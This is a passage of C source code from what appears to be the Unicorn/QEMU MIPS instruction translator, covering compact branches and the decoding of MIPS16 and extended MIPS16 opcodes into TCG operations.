OPC_BLTC */ if (rs == 0 && rt != 0) { /* OPC_BGTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t0, t1, fs); } break; case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ if (rs >= rt) { /* OPC_BOVC, OPC_BNVC */ TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); TCGv input_overflow = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32s_tl(tcg_ctx, t2, t0); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, input_overflow, t2, t0); tcg_gen_ext32s_tl(tcg_ctx, t3, t1); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, t4, t3, t1); tcg_gen_or_tl(tcg_ctx, input_overflow, input_overflow, t4); tcg_gen_add_tl(tcg_ctx, t4, t2, t3); tcg_gen_ext32s_tl(tcg_ctx, t4, t4); tcg_gen_xor_tl(tcg_ctx, t2, t2, t3); tcg_gen_xor_tl(tcg_ctx, t3, t4, t3); tcg_gen_andc_tl(tcg_ctx, t2, t3, t2); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t4, t2, 0); tcg_gen_or_tl(tcg_ctx, t4, t4, input_overflow); if (opc == OPC_BOVC) { /* OPC_BOVC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t4, 0, fs); } else { /* OPC_BNVC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t4, 0, fs); } tcg_temp_free(tcg_ctx, input_overflow); tcg_temp_free(tcg_ctx, t4); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } else if (rs < rt && rs == 0) { /* OPC_BEQZALC, OPC_BNEZALC */ if (opc == OPC_BEQZALC) { /* OPC_BEQZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t1, 0, fs); } else { /* OPC_BNEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t1, 0, fs); } } else { /* OPC_BEQC, OPC_BNEC */ if (opc == OPC_BEQC) { /* OPC_BEQC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, t1, fs); } else { /* OPC_BNEC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, t1, fs); } } break; case OPC_BEQZC: tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, 0, fs); break; case OPC_BNEZC: tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, 0, fs); break; default: MIPS_INVAL("Compact conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } /* Generating branch here as compact branches don't have delay slot */ gen_goto_tb(ctx, 1, ctx->btarget); gen_set_label(tcg_ctx, fs); ctx->hflags |= MIPS_HFLAG_FBNSLOT; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* ISA extensions (ASEs) */ /* MIPS16 extension to MIPS32 */ /* MIPS16 major opcodes */ enum { M16_OPC_ADDIUSP = 0x00, M16_OPC_ADDIUPC = 0x01, M16_OPC_B = 0x02, M16_OPC_JAL = 0x03, M16_OPC_BEQZ = 0x04, M16_OPC_BNEQZ = 0x05, M16_OPC_SHIFT = 0x06, M16_OPC_LD = 0x07, M16_OPC_RRIA = 0x08, M16_OPC_ADDIU8 = 0x09, M16_OPC_SLTI = 0x0a, M16_OPC_SLTIU = 0x0b, M16_OPC_I8 = 0x0c, M16_OPC_LI = 0x0d, M16_OPC_CMPI = 0x0e, M16_OPC_SD = 0x0f, M16_OPC_LB = 0x10, M16_OPC_LH = 0x11, M16_OPC_LWSP = 0x12, M16_OPC_LW = 0x13, M16_OPC_LBU = 0x14, M16_OPC_LHU = 0x15, M16_OPC_LWPC = 0x16, M16_OPC_LWU = 0x17, M16_OPC_SB = 0x18, M16_OPC_SH = 0x19, M16_OPC_SWSP = 0x1a, M16_OPC_SW = 0x1b, M16_OPC_RRR = 0x1c, M16_OPC_RR = 0x1d, M16_OPC_EXTEND = 0x1e, M16_OPC_I64 = 0x1f }; /* I8 funct field */ enum { I8_BTEQZ = 0x0, I8_BTNEZ = 0x1, I8_SWRASP = 0x2, I8_ADJSP = 0x3, I8_SVRS = 0x4, I8_MOV32R = 0x5, I8_MOVR32 = 0x7 }; /* RRR f field */ enum { RRR_DADDU = 0x0, RRR_ADDU = 0x1, RRR_DSUBU = 0x2, RRR_SUBU = 0x3 }; /* RR funct field */ enum { RR_JR = 0x00, RR_SDBBP = 0x01, RR_SLT = 0x02, RR_SLTU = 0x03, RR_SLLV = 0x04, RR_BREAK = 0x05, RR_SRLV = 0x06, RR_SRAV = 0x07, RR_DSRL = 0x08, RR_CMP = 0x0a, RR_NEG = 0x0b, RR_AND = 0x0c, RR_OR = 0x0d, RR_XOR = 0x0e, RR_NOT = 0x0f, RR_MFHI = 0x10, RR_CNVT = 0x11, RR_MFLO = 0x12, RR_DSRA = 0x13, RR_DSLLV = 0x14, RR_DSRLV = 0x16, RR_DSRAV = 0x17, RR_MULT = 0x18, RR_MULTU = 0x19, RR_DIV = 0x1a, RR_DIVU = 0x1b, RR_DMULT = 0x1c, RR_DMULTU = 0x1d, RR_DDIV = 0x1e, RR_DDIVU = 0x1f }; /* I64 funct field */ enum { I64_LDSP = 0x0, I64_SDSP = 0x1, I64_SDRASP = 0x2, I64_DADJSP = 0x3, I64_LDPC = 0x4, I64_DADDIU5 = 0x5, I64_DADDIUPC = 0x6, I64_DADDIUSP = 0x7 }; /* RR ry field for CNVT */ enum { RR_RY_CNVT_ZEB = 0x0, RR_RY_CNVT_ZEH = 0x1, RR_RY_CNVT_ZEW = 0x2, RR_RY_CNVT_SEB = 0x4, RR_RY_CNVT_SEH = 0x5, RR_RY_CNVT_SEW = 0x6, }; static int xlat(int r) { static int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } static void gen_mips16_save(DisasContext *ctx, int xsregs, int aregs, int do_ra, int do_s0, int do_s1, int framesize) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); int args, astatic; switch (aregs) { case 0: case 1: case 2: case 3: case 11: args = 0; break; case 4: case 5: case 6: case 7: args = 1; break; case 8: case 9: case 10: args = 2; break; case 12: case 13: args = 3; break; case 14: args = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } switch (args) { case 4: gen_base_offset_addr(ctx, t0, 29, 12); gen_load_gpr(tcg_ctx, t1, 7); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 3: gen_base_offset_addr(ctx, t0, 29, 8); gen_load_gpr(tcg_ctx, t1, 6); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 2: gen_base_offset_addr(ctx, t0, 29, 4); gen_load_gpr(tcg_ctx, t1, 5); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 1: gen_base_offset_addr(ctx, t0, 29, 0); gen_load_gpr(tcg_ctx, t1, 4); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); } gen_load_gpr(tcg_ctx, t0, 29); #define DECR_AND_STORE(reg) do { \ tcg_gen_movi_tl(tcg_ctx, t2, -4); \ gen_op_addr_add(ctx, t0, t0, t2); \ gen_load_gpr(tcg_ctx, t1, reg); \ tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); \ } while (0) if (do_ra) { DECR_AND_STORE(31); } switch (xsregs) { case 7: DECR_AND_STORE(30); /* Fall through */ case 6: DECR_AND_STORE(23); /* Fall through */ case 5: DECR_AND_STORE(22); /* Fall through */ case 4: DECR_AND_STORE(21); /* Fall through */ case 3: DECR_AND_STORE(20); /* Fall through */ case 2: DECR_AND_STORE(19); /* Fall through */ case 1: DECR_AND_STORE(18); } if (do_s1) { DECR_AND_STORE(17); } if (do_s0) { DECR_AND_STORE(16); } switch (aregs) { case 0: case 4: case 8: case 12: case 14: astatic = 0; break; case 1: case 5: case 9: case 13: astatic = 1; break; case 2: case 6: case 10: astatic = 2; break; case 3: case 7: astatic = 3; break; case 11: astatic = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } if (astatic > 0) { DECR_AND_STORE(7); if (astatic > 1) { DECR_AND_STORE(6); if (astatic > 2) { DECR_AND_STORE(5); if (astatic > 3) { DECR_AND_STORE(4); } } } } #undef DECR_AND_STORE tcg_gen_movi_tl(tcg_ctx, t2, -framesize); gen_op_addr_add(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_mips16_restore(DisasContext *ctx, int xsregs, int aregs, int do_ra, int do_s0, int do_s1, int framesize) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int astatic; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t2, framesize); gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[29], t2); #define DECR_AND_LOAD(reg) do { \ tcg_gen_movi_tl(tcg_ctx, t2, -4); \ gen_op_addr_add(ctx, t0, t0, t2); \ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); \ gen_store_gpr(tcg_ctx, t1, reg); \ } while (0) if (do_ra) { DECR_AND_LOAD(31); } switch (xsregs) { case 7: DECR_AND_LOAD(30); /* Fall through */ case 6: DECR_AND_LOAD(23); /* Fall through */ case 5: DECR_AND_LOAD(22); /* Fall through */ case 4: DECR_AND_LOAD(21); /* Fall through */ case 3: DECR_AND_LOAD(20); /* Fall through */ case 2: DECR_AND_LOAD(19); /* Fall through */ case 1: DECR_AND_LOAD(18); } if (do_s1) { DECR_AND_LOAD(17); } if (do_s0) { DECR_AND_LOAD(16); } switch (aregs) { case 0: case 4: case 8: case 12: case 14: astatic = 0; break; case 1: case 5: case 9: case 13: astatic = 1; break; case 2: case 6: case 10: astatic = 2; break; case 3: case 7: astatic = 3; break; case 11: astatic = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } if (astatic > 0) { DECR_AND_LOAD(7); if (astatic > 1) { DECR_AND_LOAD(6); if (astatic > 2) { DECR_AND_LOAD(5); if (astatic > 3) { DECR_AND_LOAD(4); } } } } #undef DECR_AND_LOAD tcg_gen_movi_tl(tcg_ctx, t2, framesize); gen_op_addr_add(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_addiupc(DisasContext *ctx, int rx, int imm, int is_64_bit, int extended) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, pc_relative_pc(ctx)); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], t0, imm); if (!is_64_bit) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); } tcg_temp_free(tcg_ctx, t0); } static void gen_cache_operation(DisasContext *ctx, uint32_t op, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, op); TCGv t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t1, base, offset); gen_helper_cache(tcg_ctx, tcg_ctx->cpu_env, t1, t0); } #if defined(TARGET_MIPS64) static void decode_i64_mips16(DisasContext *ctx, int ry, int funct, int16_t offset, int extended) { switch (funct) { case I64_LDSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 3; gen_ld(ctx, OPC_LD, ry, 29, offset); break; case I64_SDSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 3; gen_st(ctx, OPC_SD, ry, 29, offset); break; case I64_SDRASP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : (ctx->opcode & 0xff) << 3; gen_st(ctx, OPC_SD, 31, 29, offset); break; case I64_DADJSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : ((int8_t)ctx->opcode) << 3; gen_arith_imm(ctx, OPC_DADDIU, 29, 29, offset); break; case I64_LDPC: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); } else { offset = extended ? offset : offset << 3; gen_ld(ctx, OPC_LDPC, ry, 0, offset); } break; case I64_DADDIU5: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : ((int8_t)(offset << 3)) >> 3; gen_arith_imm(ctx, OPC_DADDIU, ry, ry, offset); break; case I64_DADDIUPC: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 2; gen_addiupc(ctx, ry, offset, 1, extended); break; case I64_DADDIUSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 2; gen_arith_imm(ctx, OPC_DADDIU, ry, 29, offset); break; } } #endif static int decode_extended_mips16_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int extend = cpu_lduw_code(env, ctx->base.pc_next + 2); int op, rx, ry, funct, sa; int16_t imm, offset; ctx->opcode = (ctx->opcode << 16) | extend; op = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 22) & 0x1f; funct = (ctx->opcode >> 8) & 0x7; rx = xlat((ctx->opcode >> 8) & 0x7); ry = xlat((ctx->opcode >> 5) & 0x7); offset = imm = (int16_t) (((ctx->opcode >> 16) & 0x1f) << 11 | ((ctx->opcode >> 21) & 0x3f) << 5 | (ctx->opcode & 0x1f)); /* * The extended opcodes cleverly reuse the opcodes from their 16-bit * counterparts. */ switch (op) { case M16_OPC_ADDIUSP: gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); break; case M16_OPC_ADDIUPC: gen_addiupc(ctx, rx, imm, 0, 1); break; case M16_OPC_B: gen_compute_branch(ctx, OPC_BEQ, 4, 0, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BEQZ: gen_compute_branch(ctx, OPC_BEQ, 4, rx, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BNEQZ: gen_compute_branch(ctx, OPC_BNE, 4, rx, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_SHIFT: switch (ctx->opcode & 0x3) { case 0x0: gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); break; case 0x1: #if defined(TARGET_MIPS64) check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); #else generate_exception_end(ctx, EXCP_RI); #endif break; case 0x2: gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); break; case 0x3: gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); break; } break; #if defined(TARGET_MIPS64) case M16_OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LD, ry, rx, offset); break; #endif case M16_OPC_RRIA: imm = ctx->opcode & 0xf; imm = imm | ((ctx->opcode >> 20) & 0x7f) << 4; imm = imm | ((ctx->opcode >> 16) & 0xf) << 11; imm = (int16_t) (imm << 1) >> 1; if ((ctx->opcode >> 4) & 0x1) { #if defined(TARGET_MIPS64) check_mips_64(ctx); gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); #else generate_exception_end(ctx, EXCP_RI); #endif } else { gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); } break; case M16_OPC_ADDIU8: gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); break; case M16_OPC_SLTI: gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); break; case M16_OPC_SLTIU: gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); break; case M16_OPC_I8: switch (funct) { case I8_BTEQZ: gen_compute_branch(ctx, OPC_BEQ, 4, 24, 0, offset << 1, 0); break; case I8_BTNEZ: gen_compute_branch(ctx, OPC_BNE, 4, 24, 0, offset << 1, 0); break; case I8_SWRASP: gen_st(ctx, OPC_SW, 31, 29, imm); break; case I8_ADJSP: gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm); break; case I8_SVRS: check_insn(ctx, ISA_MIPS32); { int xsregs = (ctx->opcode >> 24) & 0x7; int aregs = (ctx->opcode >> 16) & 0xf; int do_ra = (ctx->opcode >> 6) & 0x1; int do_s0 = (ctx->opcode >> 5) & 0x1; int do_s1 = (ctx->opcode >> 4) & 0x1; int framesize = (((ctx->opcode >> 20) & 0xf) << 4 | (ctx->opcode & 0xf)) << 3; if (ctx->opcode & (1 << 7)) { gen_mips16_save(ctx, xsregs, aregs, do_ra, do_s0, do_s1, framesize); } else { gen_mips16_restore(ctx, xsregs, aregs, do_ra, do_s0, do_s1, framesize); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case M16_OPC_LI: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], (uint16_t) imm); break; case M16_OPC_CMPI: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr[24], tcg_ctx->cpu_gpr[rx], (uint16_t) imm); break; #if defined(TARGET_MIPS64) case M16_OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, OPC_SD, ry, rx, offset); break; #endif case M16_OPC_LB: gen_ld(ctx, OPC_LB, ry, rx, offset); break; case M16_OPC_LH: gen_ld(ctx, OPC_LH, ry, rx, offset); break; case M16_OPC_LWSP: gen_ld(ctx, OPC_LW, rx, 29, offset); break; case M16_OPC_LW: gen_ld(ctx, OPC_LW, ry, rx, offset); break; case M16_OPC_LBU: gen_ld(ctx, OPC_LBU, ry, rx, offset); break; case M16_OPC_LHU: gen_ld(ctx, OPC_LHU, ry, rx, offset); break; case M16_OPC_LWPC: gen_ld(ctx, OPC_LWPC, rx, 0, offset); break; #if defined(TARGET_MIPS64) case M16_OPC_LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LWU, ry, rx, offset); break; #endif case M16_OPC_SB: gen_st(ctx, OPC_SB, ry, rx, offset); break; case M16_OPC_SH: gen_st(ctx, OPC_SH, ry, rx, offset); break; case M16_OPC_SWSP: gen_st(ctx, OPC_SW, rx, 29, offset); break; case M16_OPC_SW: gen_st(ctx, OPC_SW, ry, rx, offset); break; #if defined(TARGET_MIPS64) case M16_OPC_I64: decode_i64_mips16(ctx, ry, funct, offset, 1); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } return 4; } static inline bool is_uhi(int sdbbp_code) { // return semihosting_enabled() && sdbbp_code == 1; FIXME return false; } static int decode_mips16_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rx, ry; int sa; int op, cnvt_op, op1, offset; int funct; int n_bytes; op = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 2) & 0x7; sa = sa == 0 ? 8 : sa; rx = xlat((ctx->opcode >> 8) & 0x7); cnvt_op = (ctx->opcode >> 5) & 0x7; ry = xlat((ctx->opcode >> 5) & 0x7); op1 = offset = ctx->opcode & 0x1f; n_bytes = 2; switch (op) { case M16_OPC_ADDIUSP: { int16_t imm = ((uint8_t) ctx->opcode) << 2; gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); } break; case M16_OPC_ADDIUPC: gen_addiupc(ctx, rx, ((uint8_t) ctx->opcode) << 2, 0, 0); break; case M16_OPC_B: offset = (ctx->opcode & 0x7ff) << 1; offset = (int16_t)(offset << 4) >> 4; gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, offset, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_JAL: offset = cpu_lduw_code(env, ctx->base.pc_next + 2); offset = (((ctx->opcode & 0x1f) << 21) | ((ctx->opcode >> 5) & 0x1f) << 16 | offset) << 2; op = ((ctx->opcode >> 10) & 0x1) ? OPC_JALX : OPC_JAL; gen_compute_branch(ctx, op, 4, rx, ry, offset, 2); n_bytes = 4; break; case M16_OPC_BEQZ: gen_compute_branch(ctx, OPC_BEQ, 2, rx, 0, ((int8_t)ctx->opcode) << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BNEQZ: gen_compute_branch(ctx, OPC_BNE, 2, rx, 0, ((int8_t)ctx->opcode) << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_SHIFT: switch (ctx->opcode & 0x3) { case 0x0: gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); break; case 0x1: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); #else generate_exception_end(ctx, EXCP_RI); #endif break; case 0x2: gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); break; case 0x3: gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); break; } break; #if defined(TARGET_MIPS64) case M16_OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LD, ry, rx, offset << 3); break; #endif case M16_OPC_RRIA: { int16_t imm = (int8_t)((ctx->opcode & 0xf) << 4) >> 4; if ((ctx->opcode >> 4) & 1) { #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); #else generate_exception_end(ctx, EXCP_RI); #endif } else { gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); } } break; case M16_OPC_ADDIU8: { int16_t imm = (int8_t) ctx->opcode; gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); } break; case M16_OPC_SLTI: { int16_t imm = (uint8_t) ctx->opcode; gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); } break; case M16_OPC_SLTIU: { int16_t imm = (uint8_t) ctx->opcode; gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); } break; case M16_OPC_I8: { int reg32; funct = (ctx->opcode >> 8) & 0x7; switch (funct) { case I8_BTEQZ: gen_compute_branch(ctx, OPC_BEQ, 2, 24, 0, ((int8_t)ctx->opcode) << 1, 0); break; case I8_BTNEZ: gen_compute_branch(ctx, OPC_BNE, 2, 24, 0, ((int8_t)ctx->opcode) << 1, 0); break; case I8_SWRASP: gen_st(ctx, OPC_SW, 31, 29, (ctx->opcode & 0xff) << 2); break; case I8_ADJSP: gen_arith_imm(ctx, OPC_ADDIU, 29, 29, ((int8_t)ctx->opcode) << 3); break; case I8_SVRS: check_insn(ctx, ISA_MIPS32); { int do_ra = ctx->opcode & (1 << 6); int do_s0 = ctx->opcode & (1 << 5); int do_s1 = ctx->opcode & (1 << 4); int framesize = ctx->opcode & 0xf; if (framesize == 0) { framesize = 128; } else { framesize = framesize << 3; } if (ctx->opcode & (1 << 7)) { gen_mips16_save(ctx, 0, 0, do_ra, do_s0, do_s1, framesize); } else { gen_mips16_restore(ctx, 0, 0, do_ra, do_s0, do_s1, framesize); } } break; case I8_MOV32R: { int rz = xlat(ctx->opcode & 0x7); reg32 = (((ctx->opcode >> 3) & 0x3) << 3) | ((ctx->opcode >> 5) & 0x7); gen_arith(ctx, OPC_ADDU, reg32, rz, 0); } break; case I8_MOVR32: reg32 = ctx->opcode & 0x1f; gen_arith(ctx, OPC_ADDU, ry, reg32, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case M16_OPC_LI: { int16_t imm = (uint8_t) ctx->opcode; gen_arith_imm(ctx, OPC_ADDIU, rx, 0, imm); } break; case M16_OPC_CMPI: { int16_t imm = (uint8_t) ctx->opcode; gen_logic_imm(ctx, OPC_XORI, 24, rx, imm); } break; #if defined(TARGET_MIPS64) case M16_OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, OPC_SD, ry, rx, offset << 3); break; #endif case M16_OPC_LB: gen_ld(ctx, OPC_LB, ry, rx, offset); break; case M16_OPC_LH: gen_ld(ctx, OPC_LH, ry, rx, offset << 1); break; case M16_OPC_LWSP: gen_ld(ctx, OPC_LW, rx, 29, ((uint8_t)ctx->opcode) << 2); break; case M16_OPC_LW: gen_ld(ctx, OPC_LW, ry, rx, offset << 2); break; case M16_OPC_LBU: gen_ld(ctx, OPC_LBU, ry, rx, offset); break; case M16_OPC_LHU: gen_ld(ctx, OPC_LHU, ry, rx, offset << 1); break; case M16_OPC_LWPC: gen_ld(ctx, OPC_LWPC, rx, 0, ((uint8_t)ctx->opcode) << 2); break; #if defined(TARGET_MIPS64) case M16_OPC_LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LWU, ry, rx, offset << 2); break; #endif case M16_OPC_SB: gen_st(ctx, OPC_SB, ry, rx, offset); break; case M16_OPC_SH: gen_st(ctx, OPC_SH, ry, rx, offset << 1); break; case M16_OPC_SWSP: gen_st(ctx, OPC_SW, rx, 29, ((uint8_t)ctx->opcode) << 2); break; case M16_OPC_SW: gen_st(ctx, OPC_SW, ry, rx, offset << 2); break; case M16_OPC_RRR: { int rz = xlat((ctx->opcode >> 2) & 0x7); int mips32_op; switch (ctx->opcode & 0x3) { case RRR_ADDU: mips32_op = OPC_ADDU; break; case RRR_SUBU: mips32_op = OPC_SUBU; break; #if defined(TARGET_MIPS64) case RRR_DADDU: mips32_op = OPC_DADDU; check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); break; case RRR_DSUBU: mips32_op = OPC_DSUBU; check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); break; #endif default: generate_exception_end(ctx, EXCP_RI); goto done; } gen_arith(ctx, mips32_op, rz, rx, ry); done: ; } break; case M16_OPC_RR: switch (op1) { case RR_JR: { int nd = (ctx->opcode >> 7) & 0x1; int link = (ctx->opcode >> 6) & 0x1; int ra = (ctx->opcode >> 5) & 0x1; if (nd) { check_insn(ctx, ISA_MIPS32); } if (link) { op = OPC_JALR; } else { op = OPC_JR; } gen_compute_branch(ctx, op, 2, ra ? 31 : rx, 31, 0, (nd ? 0 : 2)); } break; case RR_SDBBP: if (is_uhi(extract32(ctx->opcode, 5, 6))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; case RR_SLT: gen_slt(ctx, OPC_SLT, 24, rx, ry); break; case RR_SLTU: gen_slt(ctx, OPC_SLTU, 24, rx, ry); break; case RR_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case RR_SLLV: gen_shift(ctx, OPC_SLLV, ry, rx, ry); break; case RR_SRLV: gen_shift(ctx, OPC_SRLV, ry, rx, ry); break; case RR_SRAV: gen_shift(ctx, OPC_SRAV, ry, rx, ry); break; #if defined(TARGET_MIPS64) case RR_DSRL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSRL, ry, ry, sa); break; #endif case RR_CMP: gen_logic(ctx, OPC_XOR, 24, rx, ry); break; case RR_NEG: gen_arith(ctx, OPC_SUBU, rx, 0, ry); break; case RR_AND: gen_logic(ctx, OPC_AND, rx, rx, ry); break; case RR_OR: gen_logic(ctx, OPC_OR, rx, rx, ry); break; case RR_XOR: gen_logic(ctx, OPC_XOR, rx, rx, ry); break; case RR_NOT: gen_logic(ctx, OPC_NOR, rx, ry, 0); break; case RR_MFHI: gen_HILO(ctx, OPC_MFHI, 0, rx); break; case RR_CNVT: check_insn(ctx, ISA_MIPS32); switch (cnvt_op) { case RR_RY_CNVT_ZEB: tcg_gen_ext8u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_ZEH: tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEB: tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEH: tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; #if defined(TARGET_MIPS64) case RR_RY_CNVT_ZEW: check_insn(ctx, ISA_MIPS64); 